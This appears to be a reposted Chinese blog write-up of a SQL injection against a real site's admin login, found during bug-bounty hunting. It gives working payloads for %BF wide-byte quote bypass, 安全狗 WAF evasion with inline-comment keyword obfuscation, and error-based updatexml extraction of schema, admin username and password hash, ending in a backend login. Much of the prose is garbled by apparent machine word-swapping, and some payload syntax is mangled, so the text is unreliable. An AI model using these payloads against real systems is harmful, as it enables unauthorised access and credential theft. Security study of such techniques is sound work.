序言

最近在挖补天的src,然后挖出了不少SQL注入,完了出了数据库名就不管那么多提交了。
本日挖了个报错注入的,溘然一激灵,说我不能这样颓废下去了,刚好是个后台登录的界面,我决心要登进它的后台。

2.1 注入测试

过安全狗php记一次艰苦的SQL注入过平安狗 AJAX

bp抓包,加单引号,没有什么用

很显然,这里开启了php的魔术函数,把单引号自动转义了

2.1.1 绕过第一式:汉字双字节编码绕过单引号

当开启了魔术函数过滤了引号时,可以在引号前加上一个汉字双字节编码,可以实现绕过

例如布局Payload为:

username=%BF'

%BF解码之后是中文乱码

此时发送数据包

可以看到SQL语句变成:

SELECT FROM `sl_admin` WHERE `username`='¿''

成功过滤单引号

程序报错,考虑利用爆错注入

3.1 获取数据库

既然想进后台,就须要账号密码,就要注数据库,表名,列名,内容

第一步是注出数据库,版本,用户等基本信息

先把Payload放出来,再进行讲解

Payload:

username=%BF'//and//updatexml(1,concat(0x7e,(database()),0x7e),1)#

数据库名不能放出来,在本文中用test_db代替

用这个Payload成功注出了数据库,因而版本信息,当前用户只是改一个值的事,在这里也放出来

数据库:username=%BF'//and//updatexml(1,concat(0x7e,(database()),0x7e),1)#用户:username=%BF'//and//updatexml(1,concat(0x7e,(user()),0x7e),1)#版本:username=%BF'//and//updatexml(1,concat(0x7e,(version()),0x7e),1)#

3.1.1 绕过第二式:注释

再第一个绕过那里,可以看到SQL语句后面还多了个单引号。
这个单引号要么把它闭合,要么就注释掉。
由于这里开启了魔术函数,以是选择注释。

我原来是想用 –+ 来注释的,但是网站用了安全狗,以是加号被干掉了,那就只能用 # 注释了。

注释成功,很大略,没什么好说的

3.1.2 绕过第三式:内联注释绕过空格

安全狗把空格干掉了

空格或者加号都会被干掉

当空格和加号都被干掉时,可以用内联注释 // 代替实现绕过

username=%BF//and//1'

4.1 获取表名

再得到数据库后要获取表名

先把Payload放出来

username=%BF'//and//updatexml(1,concat(0x7e,(/!50000%53elect///group_concat(table_name)//from//information_schema.tables//where//table_schema//like//database()),0x7e),1)#

管理员表用admin代替,其他表用test_table代替

4.1.1 绕过第四式:select过安全狗

注表名须要用select语句,因此我最开始写的Payload是这样的:

username=%BF'//and//updatexml(1,concat(0x7e,(select//group_concat(table_name)//from//information_schema.tables//where//table_schema//like//database()),0x7e),1)#

很快啊,被安全狗拦了

这种select的绕过是最麻烦的,我在考试测验了URL编码绕过,稠浊大小写绕过,脏数据绕过均告失落败后,打开了万能的百度,看到了这篇文章

https://www.cnblogs.com/w-i-n-d/p/8649590.html

在该文中,用 /!50000%53elect/ 代替select实现绕过

我考试测验了一下,成功实现了绕过(见上图)

后来我测试了一下,其他关键词也可以用这种方法绕过

select/!50000%53elect/order /!50000%6frder/union/!50000%75nion/

5.1 获取列名

得到了表名和列名,接下来便是要获取列名

先放Payload:

username=%BF'//and//updatexml(1,concat(0x7e,(/!50000%53elect///column_name//from//information_schema.columns//where//table_schema//like//database()//limit//7,1),0x7e),1)#

5.1.1 绕过第五式:骚操作绕过魔术函数

按照正常的注入流程,写出来的Payload该当是这样的:

username=%BF'//and//updatexml(1,concat(0x7e,(/!50000%53elect///group_concat(column_name)//from//information_schema.columns//where//table_schema//like//database()//and//table_name//like//'admin'),0x7e),1)#

问题在于,魔术函数干掉了我的单引号

于是我就开始各种百度,Google,查找怎么绕过魔术函数

Noway

就在陷入去世胡同时,我灵机一动

我在最开始学SQL注入的时候,看到information_schema数据库获取信息时,专门去看了这个数据库的构造,在columns这个表里有个字段叫 column_name ,是攻击者须要获取的信息,有个字段叫 table_schema ,对应的是该字段所在的数据库名,有个字段叫 table_name ,对应的是该字段所在的表名

因此,当同时获取了数据库名和表名时,可以获取到对应表的所有列名。

但是在表数量少且无法利用表名时,可以只指天命据库名,然后利用 limit 语句获取当前数据库所有的字段,再通过履历判断表名

例如,我想知道 数据库 test中admin表的内容

select column_name from information_schema.columns where table_schema like 'test';

这时通过直觉可以判断出,admin表中的字段是 id username password

同理,在该站点中,可以通过这种方法,获取字段

当Payload指定为:

username=%BF'//and//updatexml(1,concat(0x7e,(/!50000%53elect///column_name//from//information_schema.columns//where//table_schema//like//database()//limit//1,1),0x7e),1)#

得到的字段数为:typeid

通过修正limit后的值,就可以得到所有的字段,包括admin表中的字段

经由测试,当值为 7,1 时可以得到字段 username ;当值为 8,1 时可以得到字段 password

6.1 爆帐密

得到了以上信息后,爆帐密就很大略了

爆账号:username=%BF'+and//updatexml(1,concat(0x7e,(/!50000%53elect///username//from//sl_admin),0x7e),1)#爆密码:username=%BF'+and//updatexml(1,concat(0x7e,(/!50000%53elect///substr(password,1,31)//from//sl_admin),0x7e),1)#username=%BF'+and//updatexml(1,concat(0x7e,(/!50000%53elect///substr(password,32,31)//from//sl_admin),0x7e),1)#

由于密码长度为32,而这里最多只能显示31为,因此用substr函数分两次爆出

解密得到账号密码

登录成功

总结

实战注入的难度比靶场大得多,各种绕过,各种骚操作。

要学会利用搜索工具,更要学会选择性放弃

当一条路走不通就换另一种方法,大概就会柳暗花明又一村落

————————————————

版权声明:本文为CSDN博主「漫路在线」

原文链接:https://blog.csdn.net/realmels/article/details/122766147